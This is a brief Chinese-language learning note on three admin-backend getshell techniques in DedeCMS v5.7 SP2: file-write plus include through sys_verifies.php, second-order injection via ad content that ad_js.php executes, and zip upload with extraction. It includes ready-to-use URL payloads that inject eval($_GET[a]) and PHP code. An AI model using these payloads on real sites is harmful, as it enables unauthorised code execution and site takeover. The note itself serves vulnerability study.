dedecms v5.7 sp2 三处经典后台getshell
1、通过fopen/fwrite配合require_once文件包含进行getshell
D:\phpstudy_pro\WWW\dede\dede\sys_verifies.php
payload:http://dede.com/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//
此处进行文件包含,最终导致getshell
http://dede.com/dede/sys_verifies.php?action=down&a=echo 'zpchcbd';
类似的漏洞还有:D:\phpstudy_pro\WWW\dede\dede\stepselect_main.php 中的WriteEnumsCache函数
2、二次注入导致的getshell
D:\phpstudy_pro\WWW\dede\dede\ad_add.php
进行广告添加的时候,其中$normbody
变量是我们可以可控,这里直接写入的内容为--><?php phpinfo()?><!--
后面发现会进行取出,如果看从哪里取出呢?全局搜索#@__myad
,这个表的相关操作
D:\phpstudy_pro\WWW\dede\plus\ad_js.php,发现在这会进行取出,并且进行文件包含,--> <!--
就是为了闭合操作
然后访问:http://dede.com/plus/ad_js.php?aid=3
,这里我的广告id为3
直接命令执行
3、压缩包上传解压导致的getshell
随意上传一个附件:http://dede.com/uploads/soft/200420/1_2312144661.zip
访问:http://dede.com/dede/album_add.php
,进行解压操作!
这三种都是经典的后台getshell的方法,在这里学习记录下!